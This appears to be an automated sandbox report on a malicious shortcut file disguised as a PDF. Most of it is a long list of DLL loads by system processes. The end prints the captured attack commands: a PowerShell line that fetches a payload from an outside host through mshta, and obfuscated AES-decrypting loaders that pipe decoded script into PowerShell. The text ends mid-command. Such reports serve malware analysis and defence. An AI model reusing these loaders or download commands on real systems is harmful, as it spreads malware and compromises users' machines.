Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: appxdeploymentclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmauto.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmsvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dsrole.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: pcwum.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msv1_0.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntlmshared.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptdll.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rmclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: usermgrcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: samlib.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: es.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: taskflowdataengine.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cdp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dsreg.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Section loaded: textshaping.dll

Source: C:\Windows\System32\mshta.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11cf-8FD0-00AA00686F13}\InProcServer32

Jump to behavior

Source: filepdf.pdf.lnk.download.lnk

LNK file: ..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\AppData\Local\Temp\putty.exe

Window detected: Number of UI elements: 20

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source:	Binary string: calc.pdbGCTL source: mshta.exe, 00000007.00000003.1416103136.0000022E89A2B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000007.00000002.1448266644.0000022E89A3A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000007.00000002.1448205771.0000022E89A2D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000007.00000003.1412422783.0000022E89A64000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000007.00000003.1411931801.0000022E89A26000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000007.00000003.1411931801.0000022E89A36000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000007.00000003.1414339616.0000022E89A28000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000007.00000003.1412959268.0000022E89A36000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000007.00000003.1414216916.0000022E89A37000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000007.00000003.1419074430.0000022E89A2C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000007.00000003.1411931801.0000022E899B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000007.00000003.1418579879.0000022E89A2B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000007.00000003.1414379225.0000022E89A39000.00000004.00000020.00020000.00000000.sdmp, x64dbg2[1].7.dr
Source:	Binary string: C:\Windows\Microsoft.Net\assembly\GAC_64\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\api-ms-win-core-handle-l1-1-0.dllbf3856ad364e35\System.Management.Automation.pdb? source: powershell.exe, 0000000D.00000002.1757602646.000001B4E98D9000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: calc.pdb source: mshta.exe, 00000007.00000003.1416103136.0000022E89A2B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000007.00000002.1448266644.0000022E89A3A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000007.00000002.1448205771.0000022E89A2D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000007.00000003.1412422783.0000022E89A64000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000007.00000003.1411931801.0000022E89A26000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000007.00000003.1411931801.0000022E89A36000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000007.00000003.1414339616.0000022E89A28000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000007.00000003.1412959268.0000022E89A36000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000007.00000003.1414216916.0000022E89A37000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000007.00000003.1419074430.0000022E89A2C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000007.00000003.1418579879.0000022E89A2B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000007.00000003.1414379225.0000022E89A39000.00000004.00000020.00020000.00000000.sdmp, x64dbg2[1].7.dr
Source:	Binary string: owershell.PSReadline.pdb source: powershell.exe, 0000000D.00000002.1755831544.000001B4E95CC000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: lambda_methodCore.pdb.q source: powershell.exe, 0000000D.00000002.1757602646.000001B4E98A1000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Found suspicious powershell code related to unpacking or dynamic code loading

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Anti Malware Scan Interface: FromBase64String($kPWuaVGM);$hGgdN = [System.Convert]::FromBase64String($eoXTm);$RaRaLJdR = $hGgdN[0..15];$gnuKIz.IV = $RaRaLJdR;$jhyJONfqz = $gnuKIz.CreateDecryptor();$ugCNpUbNf = $jhyJONfqz.Transfor

Suspicious powershell command line found

Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" .(gp -pa 'HKLM:\SOF\Clas\Applications\msh*e').('PSChildName')http://ukr-netdigitalhub.pro/x64dbg2
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $eoXTm = 'AAAAAAAAAAAAAAAAAAAAAOhRfbfB0Z9oGAoMOSgiWW1szkJpy8tdpzZDtTrcpHQQScNLpta757CP3/Lp9GzqMSWF/7chhFbpK5jnKm5l5GflMVIeicKnQ3tCZoPwc82rCUKi+CN+28+YgJKXEr7fHV7bfPtkkKl/IfCV5knblgZoHjLo4alPfj3vVP9+W9dBhO1jttLCgLMu7VdweZbJhA9uHOeLEKlpTmwZhy6SBRt+2wZEQ+dEohArTgBqoSvdX1qI7jixQKp5YBiIhsJS7u1Qvr/smE9NMnRlLj8eZrE59UY+w09WbevvaCeXh61O6h2aDTpepoYId9+yEwU1DPB0GqmbzCA9QdOulsJz6fVjaGogYMrT5S7XHNY3b3K8Fds6PLI9RHngZogzd88E91dJ6Cp8l8L/0YhXqmbYzQWWtalFkji34QstydprFtIIkBj5NVpQsyMwuAirXLzRAYWUXfeXCL3bsXMbhndHMmjL5UIxljin3QbIc2iew7JoG9NPIrW1cJfuakC0Y/jFAEgey3tAySeNXUsyn3/Kdn7oJodxLIwRjwHaRO3ZSEvHxH3ar969bzsawhe34Ij3+d5OxiDnJyriW04WUQmnSpB1IiiK4H4ozAiv0sv12aPGF8M5NRhzJu5xw+dCgvgsCfFx1DUJKwQ45ufm9okusl0jpVx/O+uTL+C+FQgu6Pua4CqcOdudMNHchFijnXMID9n3adXAQrcb1tSG8Brkp0jI3sJ2d3eDgc5ERd3aZTVLrVW9YlDfWNKaNDKY0xTYJy2El0nQ1GJXLH9ZEqQjU5MWZDkryrQ2MJMkbIoRuofhdgf1Lbm0S6cGLVrPnryhnI9zO+hc3RM1f3C+NWNNFesGiRNQ8BKhRbBeJPuKvNyofEthadpJdc7RwBzuvcVrz8PfmhSwy+CNbj+mIRYU9mFJiv9fT4YKiVpQsGiZxKUu';$kPWuaVGM = 'Y1ZpbW5aY0ZUT2xpV0ZVd2FHbGNzS0Z6b2hBSHN5ZVg=';$gnuKIz = New-Object 'System.Security.Cryptography.AesManaged';$gnuKIz.Mode = [System.Security.Cryptography.CipherMode]::ECB;$gnuKIz.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$gnuKIz.BlockSize = 128;$gnuKIz.KeySize = 256;$gnuKIz.Key = [System.Convert]::FromBase64String($kPWuaVGM);$hGgdN = [System.Convert]::FromBase64String($eoXTm);$RaRaLJdR = $hGgdN[0..15];$gnuKIz.IV = $RaRaLJdR;$jhyJONfqz = $gnuKIz.CreateDecryptor();$ugCNpUbNf = $jhyJONfqz.TransformFinalBlock($hGgdN, 16, $hGgdN.Length - 16);$gnuKIz.Dispose();$mNOLJITf = New-Object System.IO.MemoryStream( , $ugCNpUbNf );$pvQGtgpn = New-Object System.IO.MemoryStream;$AjWBPWyhL = New-Object System.IO.Compression.GzipStream $mNOLJITf, ([IO.Compression.CompressionMode]::Decompress);$AjWBPWyhL.CopyTo( $pvQGtgpn );$AjWBPWyhL.Close();$mNOLJITf.Close();[byte[]] $AeGlbG = $pvQGtgpn.ToArray();$qNgJt = [System.Text.Encoding]::UTF8.GetString($AeGlbG);$qNgJt \| powershell -
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $eoXTm = 'AAAAAAAAAAAAAAAAAAAAAOhRfbfB0Z9oGAoMOSgiWW1szkJpy8tdpzZDtTrcpHQQScNLpta757CP3/Lp9GzqMSWF/7chhFbpK5jnKm5l5GflMVIeicKnQ3tCZoPwc82rCUKi+CN+28+YgJKXEr7fHV7bfPtkkKl/IfCV5knblgZoHjLo4alPfj3vVP9+W9dBhO1jttLCgLMu7VdweZbJhA9uHOeLEKlpTmwZhy6SBRt+2wZEQ+dEohArTgBqoSvdX1qI7jixQKp5YBiIhsJS7u1Qvr/smE9NMnRlLj8eZrE59UY+w09WbevvaCeXh61O6h2aDTpepoYId9+yEwU1DPB0GqmbzCA9QdOulsJz6fVjaGogYMrT5S7XHNY3b3K8Fds6PLI9RHngZogzd88E91dJ6Cp8l8L/0YhXqmbYzQWWtalFkji34QstydprFtIIkBj5NVpQsyMwuAirXLzRAYWUXfeXCL3bsXMbhndHMmjL5UIxljin3QbIc2iew7JoG9NPIrW1cJfuakC0Y/jFAEgey3tAySeNXUsyn3/Kdn7oJodxLIwRjwHaRO3ZSEvHxH3ar969bzsawhe34Ij3+d5OxiDnJyriW04WUQmnSpB1IiiK4H4ozAiv0sv12aPGF8M5NRhzJu5xw+dCgvgsCfFx1DUJKwQ45ufm9okusl0jpVx/O+uTL+C+FQgu6Pua4CqcOdudMNHchFijnXMID9n3adXAQrcb1tSG8Brkp0jI3sJ2d3eDgc5ERd3aZTVLrVW9YlDfWNKaNDKY0xTYJy2El0nQ1GJXLH9ZEqQjU5MWZDkryrQ2MJMkbIoRuofhdgf1Lbm0S6cGLVrPnryhnI9zO+hc3RM1f3C+NWNNFesGiRNQ8BKhRbBeJPuKvNyofEthadpJdc7RwBzuvcVrz8PfmhSwy+CNbj+mIRYU9mFJiv9fT4YKiVpQsGiZxKUu';$kPWuaVGM = 'Y1ZpbW5aY0ZUT2xpV0ZVd2FHbGNzS0Z6b2hBSHN5ZVg=';$gnuKIz = New-Object 'System.Security.Cryptography.AesManaged';$gnuKIz.Mode = [System.Security.Cryptography.CipherMode]::ECB;$gnuKIz.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$gnuKIz.BlockSize = 128;$gnuKIz.KeySize = 256;$gnuKIz.Key = [System.Convert]::FromBase64String($kPWuaVGM);$hGgdN = [System.Convert]::FromBase64String($eoXTm);$RaRaLJdR = $hGgdN[0..15];$gnuKIz.IV = $RaRaLJdR;$jhyJONfqz = $gnuKIz.CreateDecryptor();$ugCNpUbNf = $jhyJONfqz.TransformFinalBlock($hGgdN, 16, $hGgdN.Length - 